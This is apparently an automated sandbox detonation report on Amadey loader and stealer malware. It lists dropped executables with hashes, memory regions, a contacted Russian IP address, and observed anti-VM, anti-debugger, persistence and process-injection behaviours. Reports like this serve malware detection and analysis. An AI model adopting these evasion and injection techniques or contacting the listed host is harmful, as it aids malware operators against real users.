| SHA256 | 3a8f5f6951dad3ba415b23b35422d3c93f865146da3ccf7849b75806e0b67ce0 |
| SHA512 | 271aadb524e94ed1019656868a133c9e490cc6f8e4608c8a41c29eff7c12de972895a01f171e8f625d07994ff3b723bb308d362266f96cb20dff82689454c78f |
memory/2100-121-0x0000000000400000-0x000000000050D000-memory.dmp
memory/2808-124-0x0000000000C90000-0x0000000000CE2000-memory.dmp
memory/4016-126-0x0000000000B70000-0x0000000000BFE000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2392887640-1187051047-2909758433-1000\76b53b3ec448f7ccdda2063b15d2bfc3_c186ecc3-67e4-4d2b-8682-b6c322da87aa
| MD5 | c8c18bedbb9223d97674afd056fbad36 |
| SHA1 | fd231cd340d23c0d6d6dde8d0af43b937d1f618e |
| SHA256 | dd37b70933da899f3b5436440a8ee9d9756813d8d8ef1ce0b558bfd1c25c766d |
| SHA512 | 3550c4a994cb3662b5b28a0b709766d9be536dd8528f5327f8ffe0e1d6ee0f8e9ec0b67b37bd08000289d075715493eab43dbb21b7da68842e1127c74541f051 |
C:\Users\Public\Desktop\Google Chrome.lnk
| MD5 | 8864202c5fd6edef7dff9e7177d2d18b |
| SHA1 | cdd76aaf0a9d2ea8bcdeaf336032add0ec405313 |
| SHA256 | 3fb12096937620ecb84b306caabccdb902c67923299c433ee184cc75d4ea71c5 |
| SHA512 | fabc71dd02544a32d66fd08e75479805b42ebc1c33f7e64935e59aa7b8bf3e0085ff94e6171c5df88a80df49673dd494be6af3148f0972a2df5afcdd4de90de8 |
C:\Users\Admin\Desktop\Microsoft Edge.lnk
| MD5 | 4107e62fd0aab27e26bb5935018cc2e6 |
| SHA1 | e6bd7391484ff88297953f313789485eb4f5ac28 |
| SHA256 | e414e76bf70e2261c8da9ba3736fcd978aee74c0eee8667931d7aed356a5ef1b |
| SHA512 | 56317293399a4fcd94752ec52061f2239a682d3a939b2a94f89cc8ccaf66575bd13e66295ac4326008fd9f35d0a3d77667425cfef21ec5eb7a8cbefd62927fe7 |
C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
| MD5 | f5d7b79ee6b6da6b50e536030bcc3b59 |
| SHA1 | 751b555a8eede96d55395290f60adc43b28ba5e2 |
| SHA256 | 2f1aff28961ba0ce85ea0e35b8936bc387f84f459a4a1d63d964ce79e34b8459 |
| SHA512 | 532b17cd2a6ac5172b1ddba1e63edd51ab53a4527204415241e3a78e8ffeb9728071bde5ae1eefabefd2627f00963f8a5458668cd7b8df041c8683252ff56b46 |
memory/452-163-0x0000000000790000-0x0000000000C36000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
| MD5 | 7a02aa17200aeac25a375f290a4b4c95 |
| SHA1 | 7cc94ca64268a9a9451fb6b682be42374afc22fd |
| SHA256 | 836799fd760eba25e15a55c75c50b977945c557065a708317e00f2c8f965339e |
| SHA512 | f6ebfe7e087aa354722cea3fddd99b1883a862fb92bb5a5a86782ea846a1bff022ab7db4397930bcabaa05cb3d817de3a89331d41a565bc1da737f2c5e3720b6 |
memory/452-189-0x0000000000790000-0x0000000000C36000-memory.dmp
memory/452-191-0x0000000000790000-0x0000000000C36000-memory.dmp
memory/1484-190-0x00000000002A0000-0x00000000004E3000-memory.dmp
memory/452-195-0x0000000000790000-0x0000000000C36000-memory.dmp
memory/4016-196-0x0000000008DA0000-0x0000000008E06000-memory.dmp
memory/4016-197-0x000000000A1E0000-0x000000000A3A2000-memory.dmp
memory/4016-198-0x000000000A8E0000-0x000000000AE0C000-memory.dmp
memory/2428-201-0x00000000067B0000-0x0000000006800000-memory.dmp
memory/452-202-0x0000000000790000-0x0000000000C36000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe
| MD5 | 45b55d1e5d2bf60cc572f541ae6fa7d1 |
| SHA1 | 2329f56147a299bcdbf20520e626cc8253e49a8d |
| SHA256 | 039f5c692ba1c67c6e9b475738f40f4311e5e5625e4390d5e51685f6b4e548b8 |
| SHA512 | 5483964e050b2be073d3cf966b6dd6271556d4adfb420fb9ecf81f42f27cd06727016292dceb9a282f9fdcb451507309d1a78f58dd5d84e3022c0ea20c58dbe2 |
C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
| MD5 | 7e6a519688246fe1180f35fe0d25d370 |
| SHA1 | 8e8719ac897dfef7305311dc216f570af40709af |
| SHA256 | 32a927e9b33371b82bae9f02b5ebf07c19ae5a3a7e3c0cd3fcbee7cfff7f257a |
| SHA512 | a751e911eb254749a3c8c98740f455a5be32ce1af94dc90eba8fc677d6d7379303f80247748dfcfe9c8570edb3488a5af97fa7ff29c815bec6824dd491e27972 |
memory/1444-240-0x0000000000400000-0x0000000000643000-memory.dmp
memory/1444-243-0x0000000000400000-0x0000000000643000-memory.dmp
memory/3340-245-0x0000000000400000-0x000000000079D000-memory.dmp
memory/1444-244-0x0000000000400000-0x0000000000643000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\svchost015.exe
| MD5 | b826dd92d78ea2526e465a34324ebeea |
| SHA1 | bf8a0093acfd2eb93c102e1a5745fb080575372e |
| SHA256 | 7824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b |
| SHA512 | 1ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17 |
memory/1484-246-0x0000000061E00000-0x0000000061EF3000-memory.dmp
memory/452-269-0x0000000000790000-0x0000000000C36000-memory.dmp
memory/2288-280-0x0000000000400000-0x0000000001069000-memory.dmp
C:\Users\Admin\1000238002\Amadeus.exe
| MD5 | 36a627b26fae167e6009b4950ff15805 |
| SHA1 | f3cb255ab3a524ee05c8bab7b4c01c202906b801 |
| SHA256 | a2389de50f83a11d6fe99639fc5c644f6d4dcea6834ecbf90a4ead3d5f36274a |
| SHA512 | 2133aba3e2a41475b2694c23a9532c238abab0cbae7771de83f9d14a8b2c0905d44b1ba0b1f7aae501052f4eba0b6c74018d66c3cbc8e8e3443158438a621094 |
C:\Users\Admin\AppData\Local\Temp\1000243001\runtime.exe
| MD5 | b73cf29c0ea647c353e4771f0697c41f |
| SHA1 | 3e5339b80dcfbdc80d946fc630c657654ef58de7 |
| SHA256 | edd76f144bbdbfc060f7cb7e19863f89eb55863efc1a913561d812083b6306cd |
| SHA512 | 2274d4c1e0ef72dc7e73b977e315ddd5472ec35a52e3449b1f6b87336ee18ff8966fed0451d19d24293fde101e0c231a3caa08b7bd0047a18a41466c2525e2e8 |
memory/2156-322-0x00000000004D0000-0x00000000004E2000-memory.dmp
memory/1444-323-0x0000000000400000-0x0000000000643000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
| MD5 | 03cf06e01384018ac325de8bc160b4b2 |
| SHA1 | 1853505e502b392fd556a9ce6050207230cc70cd |
| SHA256 | 5ab3785b2b72eaf7edff8961eb8ff8dd3dc6cc7031bc96ceb06a899b6fb3bbbc |
| SHA512 | be1f2cf898db93e96e8817bf2d0ab0ef0f49d5bba4efba2de4046f6b381e8eda6ff5fcfdc057b6cbc4de5b3a7b096612c1e0d6b0d395ee685b3844ba5dc0e1b6 |
memory/3684-346-0x0000000000030000-0x00000000000C0000-memory.dmp
memory/452-347-0x0000000000790000-0x0000000000C36000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
| MD5 | 30daa686c1f31cc4833bd3d7283d8cdc |
| SHA1 | 70f74571fafe1b359cfe9ce739c3752e35d16cf5 |
| SHA256 | 504518e3b4f3abc7f1ae1bf205fdc4a9f739e05b5e84618bae9c7e66bdc19822 |
| SHA512 | 9f6c0eea9f03f9aa35ebf27ce8264e41d9072d273d1b8a35415ae4666d31013d895d1108dd67e36910200e2ac4fc45a4a9d761a1aadf02b0fd29ef93cd20a4d9 |
memory/4008-369-0x0000000000580000-0x00000000005D2000-memory.dmp
memory/4008-390-0x00000000067C0000-0x000000000680C000-memory.dmp
memory/2288-391-0x0000000000400000-0x0000000001069000-memory.dmp
memory/3936-394-0x0000000000790000-0x0000000000C36000-memory.dmp
memory/3936-396-0x0000000000790000-0x0000000000C36000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000260001\5KNCHALAH.exe
| MD5 | 3f99c2698fc247d19dd7f42223025252 |
| SHA1 | 043644883191079350b2f2ffbefef5431d768f99 |
| SHA256 | ba8561bf19251875a15471812042adac49f825c69c3087054889f6107297c6f3 |
| SHA512 | 6a88d1049059bba8f0c9498762502e055107d9f82dbc0aacfdd1e1c138bdb875cf68c2b7998408f8235e53b2bb864ba6f43c249395640b62af305a62b9bfcd67 |
memory/2196-418-0x0000012758D90000-0x0000012758F2A000-memory.dmp
memory/2196-422-0x00000127736B0000-0x00000127737DA000-memory.dmp
memory/2196-432-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-456-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-454-0x00000127736B0000-0x00000127737D4000-memory.dmp
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
memory/2196-452-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-450-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-448-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-446-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2156-1519-0x000000001BDB0000-0x000000001BE20000-memory.dmp
memory/2196-1521-0x0000012773880000-0x00000127738CC000-memory.dmp
memory/2196-1520-0x00000127737E0000-0x0000012773884000-memory.dmp
memory/2156-1518-0x000000001B220000-0x000000001B2A4000-memory.dmp
memory/2196-444-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-442-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-440-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-438-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-436-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-434-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-430-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-428-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-426-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-424-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-423-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/1484-1537-0x00000000002A0000-0x00000000004E3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe
| MD5 | 771b8e84ba4f0215298d9dadfe5a10bf |
| SHA1 | 0f5e4c440cd2e7b7d97723424ba9c56339036151 |
| SHA256 | 3f074fb6a883663f2937fd9435fc90f8d31ceabe496627d40b3813dbcc472ed0 |
| SHA512 | 2814ef23653c9be5f5e7245af291cf330c355ed12b4db76f71b4de699c67a9ffd1bdc0cc1df5352335b57ab920404b9c8e81cd9257527264bde4f72a53700164 |
memory/3096-1558-0x0000000000580000-0x00000000005A0000-memory.dmp
memory/3096-1559-0x0000000000E10000-0x0000000000E16000-memory.dmp
memory/1444-1574-0x0000000000400000-0x0000000000643000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\392887640118
| MD5 | ff40ec9dbc96e3a8a517dcfdc08d6ea3 |
| SHA1 | 628f3c0beefcf1c0fcbc8af9fa4f43c596cfc73b |
| SHA256 | fada68d6cd7155e33a70274f8f7b549fd6e7bff47a67b8d7832bbc4efc255da1 |
| SHA512 | 1f8855f5923cbcc40749271eb854771627b2782e387d292f09c1d4d28566cf8f237284ac058c0102475e31c912aa88893593d61cdd085edde41174b21ac41a92 |
C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe
| MD5 | fd2defc436fc7960d6501a01c91d893e |
| SHA1 | 5faa092857c3c892eab49e7c0e5ac12d50bce506 |
| SHA256 | ba13da01c41fa50ec5e340061973bc912b1f41cd1f96a7cae5d40afc00ff7945 |
| SHA512 | 9a3e1f2dc5104d8636dc27af4c0f46bdb153fcfada98831b5af95eeb09bb7ef3c7e19927d8f06884a6837e10889380645b6138644f0c08b9cb2e59453041ec42 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\crypteda.exe.log
| MD5 | 84cfdb4b995b1dbf543b26b86c863adc |
| SHA1 | d2f47764908bf30036cf8248b9ff5541e2711fa2 |
| SHA256 | d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b |
| SHA512 | 485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce |
C:\Users\Admin\AppData\Local\Temp\1000226001\fikbbm0902845.exe
| MD5 | c965aa525ae4cfbc3b45c6b7e9271a59 |
| SHA1 | 3a84d4c1c9277173b530263107af4caf1f61213f |
| SHA256 | 50ea6c698e72e13b8132b66bbca9479b7f4815ebb2f8adb3ca1cfec79523107e |
| SHA512 | bfddf9f5cb766b20f564b6a94048d1779431794b02cbd0993f4f3554b46b1a4e17bd3def58200da665fd991d1480b22992181ef543413d8013a19889484c3f1c |
C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe
| MD5 | db2a12edc73769f2f2b6b01545afe2c3 |
| SHA1 | 73dc44fb0753296f51b851299f468031ceb77b54 |
| SHA256 | e6db7d34b498982601b2c45ac5b2a1c1b9502e502514ccffae9862f2aa719f42 |
| SHA512 | dadf36bc9c5d88c28b9064892cc263c912ce668435b71802df756c0a4e680f8407011d36498a2511dda7165aea866c0ae794f9ec8fbcc42c7da1661399316ce4 |
C:\Users\Admin\AppData\Local\Temp\Luck
| MD5 | 2dc7d0c0f159951f61bf3a13b09248fa |
| SHA1 | 096befa4fb246d61bce5143c841a4557ef2db783 |
| SHA256 | be3789def126bae2c4aab1f575cd5a0672ad622f6ebbafa1531a8b88b144beec |
| SHA512 | bea4558dc80e80d1c7933472d2661a9a1759ea0f5ef86a6ebf48a5a828472cb6a22b2fbbe760c97a204530e03c9bd6700c64e0f66c6d12c52acaad0d95e9f38a |
C:\Users\Admin\AppData\Local\Temp\filename.exe
| MD5 | 0885bc5d9c2aa1895ebd5fcad13b53be |
| SHA1 | ad559563e4e21cb7354a4692b31852839b0b22d7 |
| SHA256 | b7763f18a43e9727036d685576fe102901f45fd1b9407395bbc10966a9811d25 |
| SHA512 | 91c73e9a3a74624dad400c0c5b7670b977946a06344782ca859be70578e64c2f0d4fdb3eadb70821168c64929a8bfe16a18fb10ba65bcd80e14701ef8c05091f |
C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif
| MD5 | 18ce19b57f43ce0a5af149c96aecc685 |
| SHA1 | 1bd5ca29fc35fc8ac346f23b155337c5b28bbc36 |
| SHA256 | d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd |
| SHA512 | a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558 |
C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe
| MD5 | 20134f10fe5275891ee287c9b7f9bf62 |
| SHA1 | 5f42316b48261176b65cb51e5d59c20e38cab03f |
| SHA256 | bebe99bb379eca567b4ab4389a56580cd271fb6e184cd84149c4b304976b21da |
| SHA512 | 7cf9fdc588f94ebd89797982bd4c0d10b5853d05aedfcea037f4c4839a6c0a2f95292f2526675c8408367f7a58cf22d82a9746941ab71a296f44f32672ac9a42 |
memory/5688-1814-0x0000000000AB0000-0x000000000115B000-memory.dmp
memory/2276-1815-0x0000000002CC0000-0x0000000002CF6000-memory.dmp
memory/2276-1816-0x00000000057B0000-0x0000000005DD8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3m30rkm4.nsf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2276-1823-0x0000000005F30000-0x0000000005F96000-memory.dmp
memory/2276-1822-0x0000000005E90000-0x0000000005EB2000-memory.dmp
memory/2276-1828-0x0000000006110000-0x0000000006464000-memory.dmp
memory/2276-1831-0x0000000006600000-0x000000000661E000-memory.dmp
memory/2276-1833-0x0000000006BE0000-0x0000000006C76000-memory.dmp
memory/2276-1834-0x0000000006AD0000-0x0000000006AEA000-memory.dmp
memory/2276-1836-0x0000000006B50000-0x0000000006B72000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe
| MD5 | 0ec1f7cc17b6402cd2df150e0e5e92ca |
| SHA1 | 8405b9bf28accb6f1907fbe28d2536da4fba9fc9 |
| SHA256 | 4c5ca5701285337a96298ebf994f8ba013d290c63afa65b5c2b05771fbbb9ed4 |
| SHA512 | 7caa2416bc7878493b62a184ddc844d201a9ab5282abfa77a616316af39ff65309e37bb566b3e29d9e764e08f4eda43a06464acaf9962f911b33e6dbc60c1861 |
memory/6024-1858-0x0000000006090000-0x00000000063E4000-memory.dmp
memory/6024-1868-0x0000000006D30000-0x0000000006D7C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000296001\Channel3.exe
| MD5 | 251026403399837fa07b9ca1481a2c77 |
| SHA1 | ada941cebcc0bb40105718cc6857f3bd597a067d |
| SHA256 | 8647df6e68b1c951961443dcce0cc03211d2ede60409ab0b448ac6df6f9cfed9 |
| SHA512 | 6a509b2d07091f4433fae8fede1623a39633c430a0361dfdd7147f3e3853c06695fcc5a58f365a959586c132d08954d06d00c353a31edf24bfbb8a98bdc8e6b5 |
memory/5688-1905-0x0000000000AB0000-0x000000000115B000-memory.dmp
memory/1500-1914-0x0000000000790000-0x0000000000C36000-memory.dmp
memory/1500-1916-0x0000000000790000-0x0000000000C36000-memory.dmp
memory/5508-1932-0x0000000000B80000-0x0000000000C0C000-memory.dmp
memory/5508-1934-0x0000000008460000-0x00000000084AC000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-07 14:44
Reported
2024-09-07 14:46
Platform
win11-20240802-en
Max time kernel
147s
Max time network
150s
Command Line
Signatures
Amadey
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\axplong.job | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3112 wrote to memory of 1608 | N/A | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe |
| PID 3112 wrote to memory of 1608 | N/A | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe |
| PID 3112 wrote to memory of 1608 | N/A | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe
"C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe"
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
Files
memory/3112-0-0x0000000000920000-0x0000000000DC6000-memory.dmp
memory/3112-1-0x00000000772E6000-0x00000000772E8000-memory.dmp
memory/3112-2-0x0000000000921000-0x000000000094F000-memory.dmp
memory/3112-3-0x0000000000920000-0x0000000000DC6000-memory.dmp
memory/3112-4-0x0000000000920000-0x0000000000DC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
| MD5 | 59953a2ace8d80a3eac87bb37cf35871 |
| SHA1 | f22821242ad268998f04a52f46ce23bf1d0bddd3 |
| SHA256 | 4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456 |
| SHA512 | 87e266458db8c1c39d4f4473b7933c30f60964f2246727c48f44b4bcfa83e3207bc660f887148316c0a09681b9795276fe25acea94b5324e1760d5a1472969f8 |
memory/3112-17-0x0000000000920000-0x0000000000DC6000-memory.dmp
memory/1608-18-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-20-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-19-0x0000000000D81000-0x0000000000DAF000-memory.dmp
memory/1608-21-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-22-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-23-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-24-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-25-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-26-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-27-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/2160-29-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/2160-30-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/2160-31-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/2160-33-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-34-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-35-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-36-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-37-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-38-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-39-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/2404-41-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-42-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-43-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-44-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-45-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-46-0x0000000000D80000-0x0000000001226000-memory.dmp